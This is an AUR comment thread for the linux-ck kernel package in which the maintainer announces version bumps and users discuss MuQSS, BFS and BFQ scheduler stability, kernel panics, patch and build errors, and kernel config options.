Notes: I suspect CK will ready a ck4 patchset, so I will continue to hold off on pushing MuQSS to [repo-ck] a little longer. AUR users are encouraged to test and communicate results via CK's blog as MuQSS matures.

graysky commented on 2016-10-22 19:51
Bump to v4.8.4-2
Changelog: Fix EXTRAVERSION variable.
Commit:
Notes: I would like to get some feedback from AUR users about stability with MuQSS before I go building [repo-ck] packages with 4.8-ck3. Please test and report back, good or bad.

graysky commented on 2016-10-22 19:48
@blitz - Thanks for the reminder... accidentally deleted that code.

blitz commented on 2016-10-22 19:11
The linux-4.8 ck patchset introduced a new versioning schema: patch-4.8-ck3

diff --git a/Makefile b/Makefile
+CKVERSION = -ck3
+CKNAME = MuQSS Powered
+EXTRAVERSION := $(EXTRAVERSION)$(CKVERSION)

From kernel version '4.8', patch '4', extraversion '1', this schema translates into 4.8.4-1-ck3-ck. To keep both ck3 and ck is extraneous and not necessary, imho.

# set extraversion to pkgrel
# remove ckX version
msg "Setting kernel extra version"
sed -ri -e "s|^(EXTRAVERSION =).*|\1 -${pkgrel}|" \
  -e "s|^(EXTRAVERSION :=).*|\1 -${pkgrel}|" Makefile

No issues here with MuQSS on my piledriver, on 4.8.4-1.

I am trying out an advanced amdgpu package, which checks for a specific config. Would it be much effort to include it, so that this check does not fail?
Kernel 4.8.4-1-ck3-ck not supported
CONFIG_DRM_AMDGPU_CIK is missing

graysky commented on 2016-10-22 11:24
Bump to v4.8.4-1
Changelog:
Commit:
Notes: I would like to get some feedback from AUR users about stability with MuQSS before I go building [repo-ck] packages with 4.8-ck3.
Please test and report back, good or bad.

Bump to v4.8.3-3
Changelog: Included 4.8-ck3 which uses MuQSS v0.115.
Commit:
Notes: I would like to get some feedback from AUR users about stability with MuQSS before I go building [repo-ck] packages with 4.8-ck3. Please test and report back, good or bad.

vishwin commented on 2016-10-22 03:21
-ck3 just released, includes MuQSS v0.115

graysky commented on 2016-10-21 19:22
Bump to v4.8.3-2
Changelog: Included 4.8-ck2 which uses MuQSS v0.114.
Commit:
Notes: I would like to get some feedback from AUR users about stability with MuQSS before I go building [repo-ck] packages with 4.8-ck2. Please test and report back, good or bad.

graysky commented on 2016-10-21 13:21
Please post these details to ck's blog so he can assist.

xevrem commented on 2016-10-21 12:17
I'm experiencing a kernel panic shortly after boot. Currently I am using the linux-ck-piledriver kernel. From journalctl -k -b -1:
Oct 21 07:03:49 vanir kernel: AMD-Vi: Completion-Wait loop timed out
Oct 21 07:03:49 vanir kernel: AMD-Vi: Event logged [IOTLB_INV_TIMEOUT device=07:00.0 address=0x000000040cfa2380]
Oct 21 07:03:49 vanir kernel: AMD-Vi: Completion-Wait loop timed out
In this log it's complaining about device 07:00.0, but it has complained about other devices as well that work perfectly fine in other kernels... I would do a dump of those dmesg logs if I could, but it appears journalctl didn't capture anything from those boot cycles...
only that one, and it never catches the kernel stack trace dump >_< Here is info about my CPU from /proc/cpuinfo if that helps:

processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 21
model           : 101
model name      : AMD FX-9800P RADEON R7, 12 COMPUTE CORES 4C+8G
stepping        : 1
microcode       : 0x6006113
cpu MHz         : 1400.000
cache size      : 1024 KB
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 2
apicid          : 16
flags (partial) : acc_power nopl nonstop_tsc extd_apicid aperfmperf eagerfpu_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb bpext ptsc mwaitx cpb hw_pstate vmmcall fsgsbase bmi1 avx2 smep bmi2 xsaveopt arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic overflow_recov
bugs            : fxsave_leak sysret_ss_attrs null_seg
bogomips        : 5392.44
TLB size        : 1536 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 48 bits physical, 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro acc_power [13]

It should be said, I do not experience these issues with the stock kernel nor the zen kernel. I've also tried the generic linux-ck kernel and experience similar issues... Any suggestions or additional info I can grab for you that would help, just let me know :)

Taijian commented on 2016-10-21 11:46
I have a question regarding some modules I am missing when I try to compile the kernel locally. These modules also fail to load with the repo-ck 4.8.3 kernel. The 4.7.6 kernel from repo-ck still had them. Specifically, I have a Dell Inspiron laptop, so I am using i8kutils to get my temp sensors and my fan to work. According to modprobed-db, this pulls in the following modules:
- dell_laptop
- dell_smbios
- dell_smm_hwmon
- dell_wmi
However, when trying to build the kernel, these modules are missing/nowhere to be found. Can anybody help point me in the right direction as to where I can pull these in from?
ooo commented on 2016-10-21 10:56
@graysky, Fair enough. Although the pending/ patches for bfs512 aren't really 'development' patches, but fixes to bugs that were discovered after the bfs512/ck1 release. My understanding is that ck simply didn't want to make a new release, but still recommends adding the fixes. Since some people seem to be having issues with bfs512, it would make sense to me to apply those. I have no problems myself, but I guess anyone having issues with linux-ck-4.8* should try whether adding the pending bfs512 patches helps.

nTia89 commented on 2016-10-21 10:09
@SuperIce97 I posted here just to advise other users...

graysky commented on 2016-10-21 09:41
@ooo - I don't want to include pending patches without CK specifically asking, since this is not a development package. You are free to modify the PKGBUILD on your own, of course.
@eduardoeae - I saw the release but am a bit reluctant to bump and push to [repo-ck] since a few reports to the blog you linked indicate issues still. Perhaps the AUR can have it, but I will hold off on publishing to the repo initially.

With MuQSS on, no problem; and if no MuQSS?

snack commented on 2016-10-20 07:38
It seems that virtualbox-ck-host-modules-core2 (and possibly other virtualbox-ck-host-modules packages) in the repo have been built with a wrong dependency on the linux-ck-core2 version, since pacman says:
$ sudo pacman -Su
:: Starting full system upgrade...
resolving dependencies...
looking for conflicting packages...
error: failed to prepare transaction (could not satisfy dependencies)
:: virtualbox-ck-host-modules-core2: installing linux-ck-core2 (4.8.2-1) breaks dependency 'linux-ck-core2<4.8'

@agm28011997 - CK has stuff in his pending queue beyond MuQSS108, but I don't want to continually add these since the rate of development of MuQSS is as rapid as it has been. Once MuQSS is finalized and replaces BFS, this package will be here applying it.
Those nvme patches are listed on the Arch wiki for fixing an issue with power saving on nvme disks. I'm just trying to figure out if I should add those patches to the PKGBUILD when I pick up an nvme drive in a couple of weeks. I'll at least test to see if there are any incompatibility issues. If they work without issue, should they get added into the ck repo until they reach mainline?

graysky commented on 2016-10-07 00:07
@jwhickman - Dunno about NUMA. Have to ask some users to test and verify that it is or is not a problem. Anyone willing to test? Also, I don't think MuQSS is stable at this point. We'll probably have BFS until the 4.9 release if I read CK's blog correctly. In either case, the linux-ck brand is here to stay; MuQSS will still have the ck1 brand as I understand it.

jwhickman commented on 2016-10-06 12:52
Thanks @graysky! I modified this to build MuQSS for kernel 4.8; no problems besides having to comment out the BFQ patches due to a compile failure, unsurprisingly. I was hoping the kernel 4.7 BFQ patches would work on 4.8, since the patches applied without issue. :) Question for you: is the 'NUMA disable issue' still relevant? It's been around a long time, plus now this is MuQSS. Also, I noticed in my 4.8 build that the config showed a new tick rate of 250 Hz, so I was also curious about that.

/=======================================================
# Running with a 1000 HZ tick rate (vs the ARCH 300) is reported to solve the issues with the bfs/linux 3.1x and suspend.
[...]
_1k_HZ_ticks=y
### Do not disable NUMA until CK figures out why doing so causes panics for some users!
[...]
#_NUMAdisable=
=======================================================/

In the commented original discussion on the tick rate, ck has said, "(16 September 2013 at 18:55) If it still needs 1000Hz to work correctly, then there is still a bug." Anyway, thanks again!

@vishwin - Sorry, but not out of date until BFQ for 4.8 is released.
I do not see MuQSS104 patching against the 4.7 code-base (although CK is working on 105 as we speak)... plus, 4.8-ARCH is probably still in the works as it hasn't been built nor hit [testing] just yet.

artafinde commented on 2016-10-03 13:45
I actually won't be enabling this unless it turns out to be stable enough and gives something to <= 8 CPUs. I've enabled it on my laptop and screwed up the BTRFS ctree. Seems like I'm reformatting today. I can't really blame MuQSS since there's a big WARNING on top, but it's a warning to users here. Could be something else, but it all started after I compiled and booted the MuQSS-enabled kernel. The combination was: CPU Haswell, BTRFS single metadata SSD 1 device, BFQ enabled by default, localmodules enabled, and MuQSS.

kogone commented on 2016-10-03 13:40
maybe we should create a rubric of tests to run to see the difference of MuQSS running on CPUs with <= 8 cores?

artafinde commented on 2016-10-02 09:26
In the blog post, CK mentions only CPUs, not cores. I'm not entirely sure how the runqueues are defined (per CPU or per core), but my understanding from the post is that it targets servers and makes BFS more comparable to mainline CFS.

zerophase commented on 2016-10-02 09:05
@artafinde Does MuQSS benefit more than 1 CPU die, or multiple cores? Say 8+?

artafinde commented on 2016-10-02 08:58
MuQSS is really targeting multi-CPU systems. As per the comment from CK, "it will make a difference in 16+ CPUs and with high loads". I suppose we can still use it for testing purposes, but it is unlikely we will produce any lockups to help surface bugs on desktop/laptop PCs. 103 is out btw.

Well, I'm using makepkg. I have a local directory in which I do a git pull every time there is an update. But I am doing makepkg -C. Maybe I should try cleaning up the previous source manually before building. Currently, it DOES do two builds: it finishes building linux-ck, and then proceeds with unpacking linux-ck-headers and compiling that.
It does warn about the PKGBUILD being a split package. When using yaourt, it does build twice, but I guess that is to be expected.

I think you got it wrong. What @Rainmaker said is that when we build the linux-ck and linux-ck-headers packages, the kernel will be compiled twice, which is unnecessary and a waste of time and power. When we build linux-ck-headers, linux-ck will also be compiled and provided. We can just accept installing both packages instead of linux-ck-headers only when pacman prompts us.

4.7.3-5 (linux-ck-headers-4.7.3-5 with linux-ck-piledriver-4.7.3-5) fails to boot for me; it just freezes partway through, so I had to go back to 4.7.3-4. I have an AMD 9590 CPU.

I compiled linux-ck 4.7.3-5 from the AUR last night with native optimizations as set in nconfig. I still got a kernel panic when I was playing games inside a VM. I am using 4.7.1-1 for now and will see if crashes still occur. EDIT: Crashes seem to no longer occur, at least for now, after 3 hours of consecutive VM gaming.

zerophase commented on 2016-09-15 08:49
@agm28011997 Odd, I'm not getting any freezes with Haswell-E that I believe are caused by the kernel. I just freeze when I have CLion and a Windows VM up. (I put that down to changing the CLion VM options for parsing a large CMake file.) I'm pretty sure I didn't use up all of my RAM or swap. Maybe it is the kernel.

evilpot commented on 2016-09-15 08:06
it's crashing all over the place...

agm28011997 commented on 2016-09-14 17:04
incredible man, I don't know what the difference is or what the new code has, but on my i5 4690 Haswell with Intel HD graphics, from git all is perfect with one hour of gaming now and no freezes; it is something weird because the freezes are supposedly still here. @graysky thanks for your work, both of you, I wish I could help more than testing packages. When you put the new version in the repo I will test it to report the issues, but I think that the freezes will continue, due to the other comment on the page. @saren what is BTW?
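The split-package behavior being debated above can be sketched as a skeleton PKGBUILD: makepkg runs build() exactly once and then each package_*() function in turn, so a merged PKGBUILD would not compile the kernel twice. The function bodies here are placeholders, not the real packaging steps:

```shell
# Hypothetical split PKGBUILD skeleton: one build(), two package_*() functions.
pkgbase=linux-ck
pkgname=('linux-ck' 'linux-ck-headers')

build() {
  # makepkg calls this once for the whole split package, so the
  # expensive kernel compile happens a single time
  :
}

package_linux-ck() {
  :  # would install vmlinuz, modules, preset, and hook
}

package_linux-ck-headers() {
  :  # would install the build/headers tree for out-of-tree modules
}
```

Building twice, as yaourt apparently does, is then the helper's fault, not the PKGBUILD's.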
I have looked through journalctl for the hour of the freezes and there is nothing... the freeze makes my computer do nothing, repeat the last 2 seconds of music or so, the mouse won't move, and the keyboard is the same.

graysky commented on 2016-09-13 19:40
Bump to v4.7.3-5
Changelog: update to ck4/bfs497 and re-enable CONFIG_CGROUP_SCHED.
Commit:
Note: I am waiting to hear back from CK before I build the repo packages since he may suggest disabling CONFIG_CGROUP_SCHED. I like to think that the Arch community plays a large role in helping CK to refine bfs, so AUR users please continue to provide feedback to ck's blog as usual:

Saren commented on 2016-09-13 19:38
@agm28011997 Haswell-EP is the Xeon version of Haswell CPUs; linux-ck-haswell should be 100% compatible with it. I am downgrading once again from 4.7.2-2 to 4.7.2-1 because of your comment. :/ BTW, I can confirm the lockup is a kernel panic.

agm28011997 commented on 2016-09-13 19:30
@saren what is haswell-EP? my freezes started at 4.7.2-2 with the bfs 472 patch. Another thing: post your problem on Con Kolivas' blogspot.
@th3voic3 I am in the same situation as you; if you want, you can downgrade to version 4.7.2-1 with patch bfs472, which is very stable for me.
@graysky try enabling cgroups if you want, because for Haswell desktop users there are too many lockups to use this kernel; we'll wait for a solution.

Saren commented on 2016-09-13 19:24
Haswell-EP user here, using linux-ck-haswell. Getting 3 random lockups already since 4.7.3: 2 of the lockups during GPU passthrough gaming, and the remaining one happened while watching YouTube videos. I am downgrading to 4.7.2 as suggested by the comments to see if the issue goes away.

th3voic3 commented on 2016-09-13 19:09
I'm using a Haswell CPU and a qemu VM with PCI passthrough. With the recent kernels my entire host would lock up as soon as I shut down my VM. I just compiled the kernel with the new patch version and enabled CONFIG_CGROUP_SCHED. Just had a lockup again.
Although I had lockups with or without CONFIG_CGROUP_SCHED. Haven't tested this patch yet with the option disabled. For now I'm using the mainline kernel. No issues there.

I'm on a Sandy Bridge machine and using the SandyBridge package from the repo. I ended up having the same complete system freezes as well as a kernel panic on shutdown/reboot even after updating to 4.7.3-4. As of yesterday evening I rolled back to 4.7.2-1 and I seem to be stable again.

agm28011997 commented on 2016-09-12 12:44
CONFIG_CGROUP_PIDS=y
CONFIG_CGROUP_FREEZER=y
what do these lines mean with cgroups disabled??

agm28011997 commented on 2016-09-12 11:52
@graysky after a few tests I still have freeze problems while gaming, browsing, etc... something weird, because it is a problem that affects Haswell desktops only, based on reading forums and ck's blog. I tried the generic linux-ck package in the repo too, but it has freezes as well.

@pnehem @graysky I've recompiled the kernel without CONFIG_CGROUP_SCHED as well (GCC 6.2.1), and for me, it DOES seem to solve the persistent kernel oops. I'll try to test it more than just poking it with a stick; meanwhile, you can use this config patch (I know it's like sixty lines with context, shut up):

QuartzDragon commented on 2016-09-10 00:43
I've disabled CONFIG_CGROUP_SCHED and am rebuilding to see if the problem persists.

bacondropped commented on 2016-09-09 23:28
@pnehem It seems to happen around the same time for me as well, specifically during the Xorg launch sequence (I'm running KDE on Manjaro, so for me, it happens during/after the Plymouth splash). Another person reported an oops with a stack trace that looks almost like mine (sans maybe two entries in the middle):
Does your stack trace look like the one in that gist? I'm currently rebuilding the kernel with GCC 5.4.0 instead of 6.2.1 to eliminate the toolchain; I'll let you know how that goes.
UPDATE: @graysky Do you think disabling cgroups might be worth considering?
CK writes that they're unstable and are known to cause problems/panics:
UPDATE: rebuilding with GCC 5.4.0 does NOT fix the problem (reminder, here's the problem I'm trying to fix; the bug report is not mine, but it has a very similar stack trace:)

pnehem commented on 2016-09-09 20:34
Hello, I'm getting a kernel panic as well, but I was trying to figure out where it was happening, because I can get to my login screen just fine. But when I go to log in, it kernel panics and locks up the computer. I was just getting ready to start reading logs.
--update: I updated my system but am still getting a seg fault/kernel panic. I get to the login/sddm screen just fine, but when I try to go farther the screen goes black; I can see the cursor and nothing responds. It locks up the whole system, sort of: I can do ctrl-alt-F2 and log in from the "command line", but I can't make heads or tails of the logs.

agm28011997 commented on 2016-09-09 17:51
@graysky Con Kolivas has commented that you use the cgroups patch, but he also said that it is still unstable. I don't think this is the problem, but can someone who has my problem try to recompile the kernel without this patch to see if the problem is fixed? Another thing: do the people who have my problem have C-states enabled in the BIOS? It's an idea...

agm28011997 commented on 2016-09-09 14:19
@graysky what changes have you made in the ck kernel between 4.7.2-1 and 4.7.2-2 with bfs 480? I reverted to the older kernel and I have no freeze problems with cpufreq and pstate, but I am the only person that appears to have this problem. Is the cgroups patch enabled in the repo?

agm28011997 commented on 2016-09-09 14:11
@QuartzDragon kernel oops? What do you mean?

agm28011997 commented on 2016-09-09 12:57
I don't know why, but I changed p_state to cpufreq and the freezes continue here... I used pstate powersave and cpufreq powersave, and nothing; with both of them, and I think the rest too, I get random freezes. Is it the RAM? the memory? the cache? I don't know...
I think the config.x86_64 got copied over with config (which is i386)? Looking at the diffs, this does not seem correct and is specifying the 32-bit version:
-CONFIG_64BIT=y
-CONFIG_X86_64=y
+# CONFIG_64BIT is not set
+CONFIG_X86_32=y

I tested the latest kernel and for the moment I have only had one freeze since I updated. I am not sure if the problem is the memory, but I don't think so, with 8 GB of RAM and 6 GB of swap. The only thing is that I have the tmp files mounted in RAM, but... not sure... before, the PC did not freeze...

zerophase commented on 2016-09-08 00:04
@agm28011997 I just run out of memory if I'm doing things with Unreal. It's because I don't have enough swap space. (Going to fix that once I get an NVMe SSD, and just use my old SSD for swap.) I set my CPU to performance mode, so I don't encounter issues with frequencies changing.

Does anyone with a Haswell desktop, the p-state driver, and the latest ck kernel have freeze problems? I am getting freezes all the time with that kernel; the older one doesn't do this to me, and on another laptop with an AMD CPU it didn't do this either.

Regarding enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz: the GCC 6 series has target-specific improvements for Intel Skylake (-march=skylake-avx512) and AMD Zen (family 17h) processors (-march=znver1 and -mtune=znver1 are now available).
:: New Targets and Target Specific Improvements

If that's true (the lack of support for SMT_NICE), you will need to patch the source prior to building or email CK to ask him to include it in the ck1 patchset, as I think your hardware is in the minority of users.
I don't want to just apply a patch like that without CK's blessing, particularly when the code doesn't help 99% of the users :) Well, they are certainly in the sources: % grep CONFIG_SMT config.x86_64 CONFIG_SMT_NICE=y % grep CONFIG_SMT config CONFIG_SMT_NICE=y And in the [repo-ck] packages, but I can't control what you do to the PKGBUILD on your own machine :p % uname -r 4.7.1-1-ck % zgrep CONFIG_SMT /proc/config.gz CONFIG_SMT_NICE=y - Regarding configs without CONFIG_SMT_NICE set? Linux-ck and the Arch kernel both have this set. I don't want to add a conditional in the PKGBUILD that inspects $srcdir/linux-$pkgver/.config and patches if so, for example. enihcam commented on 2016-08-16 23:08 graysky commented on 2016-08-16 19:36 Bump to v4.7.0-1 LinuxChanges: Commit: graysky commented on 2016-08-16 13:31 Is this in CK's pending set? Can you get him to articulate a timeline to implement it into the next bfs? If the code is not tested enough, for example, and if he feels more time and testing is needed, I do not want to push unstable code to the aur and, by analogy, to the 4000+ users of [repo-ck]. enihcam commented on 2016-08-16 06:19 @SuperIce97 @graysky The issue exists in the bfs code. The following patch fixes it. --- linux-4.7.orig/kernel/sched/bfs.c +++ linux-4.7/kernel/sched/bfs.c @@ -1418,6 +1418,9 @@ static void try_preempt(struct task_stru * a different CPU set. This means waking tasks are * treated differently to rescheduling tasks. */ +#ifndef CONFIG_SMT_NICE + cpu = cpu_of(highest_prio_rq); +#endif set_task_cpu(p, cpu); resched_curr(highest_prio_rq); } SuperIce97 commented on 2016-08-15 23:50 @enihcam I haven't had any issues with it, and 4.7 is what the mainline Arch kernel is at right now. Do you have issues with the default arch kernel now? If you do, report it to the arch bug tracker so they can try to get it fixed. The panics are almost certainly BFQv8 related. Reverting to BFQv7r11 makes them go away.
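The config checks being traded above can be wrapped into a small helper so the same test works against any saved config file. A sketch, using nothing beyond grep; the kconfig_enabled name is mine, not part of any tool:

```shell
# Check whether a kernel config file enables an option, either built in (=y)
# or as a module (=m). Usage: kconfig_enabled FILE OPTION
kconfig_enabled() {
    grep -Eq "^${2}=(y|m)\$" "$1"
}

# Example against the extracted build config (path is illustrative):
#   kconfig_enabled config.x86_64 CONFIG_SMT_NICE && echo "SMT_NICE is set"
# For the running kernel, decompress first: zcat /proc/config.gz | grep CONFIG_SMT_NICE
```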
I was able to get good panic output by logging to the serial port. I'm not a linux-ck user, rather a standalone BFQ user. I've started a thread on paolo's newsgroup to work through this issue: Because of these stability issues, I'd recommend linux-ck revert to BFQv7r11. - That is the default for the PKGBUILD except for _BFQ_enable_=y (and the NUMA code has been commented out for ages now). The only diff you have is enabling BFQ by default, but that shouldn't trigger a bug, as you activated it through other means before. Yes, I only installed one disk (/dev/sda) and enabled BFQ on it. Several hours ago, I checked it with cake-pc# cat /sys/block/sda/queue/scheduler noop deadline cfq [bfq] I am sorry that I did not try recompiling `linux-ck=4.6.5` with `_1k_HZ_ticks=`. I just changed `grub.cfg` and rebooted with the stock kernel ... Everything seems to be working fine ... I am wondering what is going on when the system freezes. So if you require any other information, please let me know. I'm getting patching errors (likely) during prepare() execution which result in a makepkg build failure. It happens while the -ck patchset is being applied, and I have no idea at all what's causing it - maybe these patches are outdated, maybe it's just 4.6.5-incompatible (although I don't think so, as the errors happen in the bfq.c/bfq.h files, for example). Right now my best guess is that the fourth BFQ patch is causing that, because that makes sense - it might have been okay a while ago, but now its name in the PKGBUILD is useless as it's wrong; I've changed it as @herraiz suggested and, well, everything's okay except patching X) Does anybody else experience this issue as well? EDIT: After a little research I've found out (I hope so) that the thing responsible for that problem is... Yup, the -ck patchset itself. Ta-daa! @graysky, yes: pacaur. Should I run makepkg manually? I want to note that I have been using pacaur previously to install and update linux-ck without any problems.
EDIT: Running it manually right now using "makepkg -fsic". EDIT 2: Well that worked. That's the first time an AUR helper bit me, especially pacaur which is supposed to be very reliable (). Sorry about this. graysky commented on 2016-07-28 00:56 Are you using an aur helper? cryzed commented on 2016-07-28 00:36 When updating to the latest version, I get the following error after the seemingly successful compilation process: > ==> Finished making: linux-ck 4.6.5-2 (Do 28. Jul 02:33:40 CEST 2016) > ==> Cleaning up... > :: Installing linux-ck,linux-ck-headers package(s)... > :: linux-ck,linux-ck-headers package(s) failed to install. Check .SRCINFO for mismatching data with PKGBUILD. The .SRCINFO looks like this:. I did the following modifications to the PKGBUILD: > _1k_HZ_ticks= > _BFQ_enable_=y I don't use the sleep/suspend feature, hence the first change. My /etc/makepkg.conf has the following modifications: > MAKEFLAGS="-j$(nproc)" @Tjuh - Yes, that is likely your problem. I highly recommend using modprobed-db if you want to make localmodconfig for this purpose. Just know that it's only as good as your database and if you want to have a new module that you haven't used before, you will have to boot into a kernel that actually has this module available for modprobed-db to learn that you have an interest. Hope that makes sense. See the wiki for more. - Dunno why, it's in the config and it loads on my system running 4.5.5-ck-1 % zgrep -i zram /proc/config.gz CONFIG_ZRAM=m CONFIG_ZRAM_LZ4_COMPRESS=y Have you perhaps not rebooted since updating to 4.5.5? So I've tried to compile this atleast a dozen times, but it fails everytime at applying a patch; ... ==> Patching source with ck1 including BFS v0.469 patching file arch/powerpc/platforms/cell/spufs/sched.c The next patch would create the file Documentation/scheduler/sched-BFS.txt, which already exists! Skipping patch. 
1 out of 1 hunk ignored/sysctl.c patching file lib/Kconfig.debug patching file include/linux/jiffies.h patching file drivers/cpufreq/cpufreq.c patching file drivers/cpufreq/cpufreq_ondemand.c The next patch would create the file kernel/sched/bfs.c, which already exists! Skipping patch. 1 out of 1 hunk ignored patching file include/uapi/linux/sched/x86/Kconfig Hunk #2 succeeded at 1294 (offset 1 line). Hunk #3 succeeded at 1314 (offset 1 line). Hunk #4 succeeded at 2012 (offset 1 line). Hunk #5 succeeded at 2041 (offset 1 line). patching file include/linux/sched/prio.h patching file drivers/cpufreq/intel_pstate.c patching file kernel/sched/idle.c patching file kernel/time/posix-cpu-timers.c patching file kernel/trace/trace_selftest.c patching file kernel/Kconfig.preempt patching file kernel/Kconfig.hz patching file Makefile ==> ERROR: A failure occurred in prepare(). Aborting... ... @QuartzDragon - Yes, Paolo told me as much in a private email but I don't want to force all the repo users to be guinea pigs since the 4.5 series of BFQ should be released very shortly per Paolo. @kyak - No problem, thanks for pointing that out. @francoism - No testing is needed, it's just that adding support required tweaks to the entire set of packages (ie adding conflicts arrays) the skylake packages will be included in the next build (either 4.4.8 or 4.5.2 or whenever Paolo releases BFQ for 4.5.x - whichever comes first). francoism90 commented on 2016-04-19 18:01 Hi graysky, Thanks for providing Linux-ck, really like the BFQ scheduler and also like the easy tweaking/customizing. :) Sorry if this is already ask before, but if testing is needed for the v4.5.x series, please let me know. I'm running on Skylake platform, maybe this platform needs more testing? :P Thanks again! kyak commented on 2016-04-19 14:54 @graysky - thank you, all works fine now! As for rename, i'm not pushing at all; this is just something to keep in mind. Thanks again! 
QuartzDragon commented on 2016-04-19 12:59 Greetings graysky, Some users on the BFQ mailing list have tested the v7r11 4.4.0 patches on the 4.5.0 kernel and have found that they work without any issues. I've also tested for myself with a modified PKGBUILD and found they work stably and without any issues or quirks compared to CFQ, no matter my system load or uptime. I guess your plan is to wait for the official patches? Thanks! But virtualbox-ck-host-modules-ivybridge and virtualbox-host-modules-arch are conflicting now. How should we handle this? By the way, does it make sense to change the naming convention in accordance with upstream - i.e. virtualbox-host-modules-ck-ivybridge? I tried the steamos-xpad driver. Error! There are no instances of module: steamos-xpad 20160103 located in the DKMS tree. error: command failed to execute correctly I tried deleting the xpad.ko.gz file from the 4.4.6-1-ck kernel with no luck. Bump to v4.4.6-1 Changelog: Commit: LinuxChanges: NOTE -- Even though CK has released BFS for linux v4.5.x, there is not a corresponding BFQ I/O scheduler for this series yet, so please don't flag out-of-date until Paolo has done so. I'm not sure if this is what you meant, but graysky doesn't create the ck patchset; Con Kolivas does. See: graysky puts together the AUR linux-ck PKGBUILD once Con Kolivas releases updated versions of the patchset. @thevictoryiswon gpg --recv-keys ABAF11C65A2970B130ABE3C479BE3E4300411886 647F28654894E3BD457199BE38DBBDC86092693E Distorted commented on 2016-03-09 08:59 @thevictoryiswon Look at some of the older comments; your issue has come up numerous times. thevictoryiswon commented on 2016-03-09 04:00 It will not build for me. Has it been corrupted? ==> Verifying source file signatures with gpg... linux-4.3.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.3.6 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified!
WFV commented on 2016-03-06 23:13 Thanks graysky and FadeMind, the rebuild worked. FadeMind commented on 2016-03-06 21:50 @WFV kernel images store the systemd version from the time the image was created. To bump it, just run sudo mkinitcpio -P and reboot. Alternatively, ignore it, or add rd.udev.log-priority=3 to the GRUB_CMDLINE_LINUX line in the grub conf file /etc/default/grub to prevent the systemd version from being printed during boot. Update grub after making changes to the conf file, of course. Looks like there is some problem with the intel i965 driver on the 4.3.6-1-ck kernel. The Xorg cursor does not render. However, there are no errors in the xorg log. Changing the acceleration method to the old uxa fixes the problem. All is ok with the arch vanilla kernel (4.4.1). Anonymous comment ==> Verifying source file signatures with gpg... linux-4.3.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.3.4 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> ERROR: Makepkg was unable to build linux-ck. ==> Restart building linux-ck ? [y/N] - I try to be as true to the Arch config as I can be for linux-ck. You are of course free to customize/build your own. My suggestion is for you to open a flyspray against the official Arch linux package asking for this. You might want to include your reasoning why it would be important. XenGi commented on 2015-12-14 10:51 hi, Could you set CONFIG_CHECKPOINT_RESTORE=y for all ck kernels? I'm using the broadwell build from repo-ck. This would enable fancy process names for LXC. The setting is not set atm. ``` $ zgrep 'CONFIG_CHECKPOINT_RESTORE' /proc/config.gz # CONFIG_CHECKPOINT_RESTORE is not set ``` Here's a thread explaining the issue: I got this weird message during the boot process: [ 47.772679] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 52.807884] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10).
[ 57.842769] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 62.877924] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 67.912998] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 72.947899] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 77.982966] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 83.017963] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 87.661070] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 88.053001] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). It still shows up when I check dmesg. The message only appears when I use the ck kernel. Is there something wrong with the ck kernel? For all those with this problem in dmesg/bootup: [drm:intel_pipe_config_compare [i915]] *ERROR* mismatch in has_drrs (expected 1, found 0) There's also a warning, I don't know if it is related: WARNING: CPU: 1 PID: 6 at drivers/gpu/drm/i915/intel_display.c:12700 intel_atomic_commit+0xdea/0x1390 [i915]() Bug submitted here: linux-ck is the main package for GENERIC (ALL) CPUs and of course can be adjusted BEFORE compiling. The variants customized by CPU name are designed for powerful AMD and Intel CPUs; see: they are available on the repo-ck.com repo site. IF You have installed linux-ck-ivybridge You have these options: 1. Download the sources of linux-ck and a custom config file to enable the valid CPU family for GCC, and compile it. 2. Purge all the -ck packages (linux-ck-ivybridge, bbswitch-ck, and nvidia-ck-ivybridge) 3. Purge and install again the bbswitch-ck package (the major linux version bumped from 4.1 to 4.3 and the package NEEDS to be recompiled against 4.3) 4. Install the new version of nvidia-ck ready for 4.3 OR JUST WAIT for the proper packages to be uploaded to the repo-ck repository. The SUBFORUM of AUR packages IS designed for reporting ISSUES with PKGBUILD/package builds.
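FadeMind's earlier tip (adding rd.udev.log-priority=3 to GRUB_CMDLINE_LINUX in /etc/default/grub) can be scripted. A sketch; add_grub_param is my name for it, and it assumes the parameter contains no characters special to sed:

```shell
# Append a kernel parameter to the GRUB_CMDLINE_LINUX line of a grub
# defaults file. Usage: add_grub_param FILE PARAM
add_grub_param() {
    sed -i "s/^\(GRUB_CMDLINE_LINUX=\"[^\"]*\)\"/\1 ${2}\"/" "$1"
}

# Afterwards regenerate the config, e.g.:
#   grub-mkconfig -o /boot/grub/grub.cfg
```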
